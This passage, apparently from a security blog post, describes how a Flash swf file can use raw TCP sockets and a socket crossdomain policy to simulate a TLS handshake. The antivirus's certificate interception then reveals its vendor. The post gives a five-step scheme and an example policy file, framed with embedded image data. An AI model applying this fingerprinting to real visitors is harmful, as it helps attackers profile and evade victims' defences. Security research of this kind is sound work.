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" /><br />
<br />
<br />
<b>The second feature.</b> Flash supports raw TCP sockets. Actually, there is an opportunity to send/receive any tcp packet to any port of a remote server from a swf file in a browser. But as this feature could be an issue in terms of security, Flash supports crossdomain policy for sockets. If a swf file wants to connect a remote server via a raw socket, Flash connects to 843 tcp port on the server and sends a request ("<policy-file-request/>") and gets a crossdomain xml response. The crossdomian file contains information from which ports and from which domains are allowed to connect to the server.<br />
<br />
Example of socket crossdomain:<br />
<blockquote class="tr_bq">
<?xml version="1.0"?><br />
<!DOCTYPE cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd"><br />
<cross-domain-policy><br />
<site-control permitted-cross-domain-policies="master-only"/><br />
<allow-access-from domain="*" to-ports="443,995,465,587" /><br />
</cross-domain-policy></blockquote>
The curious thing happens when we use both of these features. If we simulate TLS connection from a swf file to a remote host on a specific port (443,587, etc.), then an AV intercepts it. So, our swf receives a TLS certificate generated by the AV and we detect a vendor of the AV from a root CA name. <br />
<br />
The overall scheme of the method:<br />
0) A user visits to our site. Our malicious swf is loaded by the user's browser.<br />
1) Swf requests a socket crossdomain policy from 843 port of our server and gets required permissions.<br />
2) Swf connects to our server (port 443, 465, etc.) and send a 'Client Hello' TLS packet (in raw bytes)<br />
3) The server replies a 'Server Hello' TLS packets with the server’s certificate.<br />
4) AV intercepts connections, generates a new certificate and signs it using the AV's own root CA<br />
5) SWF receives the TLS packet (with a certificate) from AV and resends it to our server where we can parse it and get the name of root CA.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="data:image/png;base64,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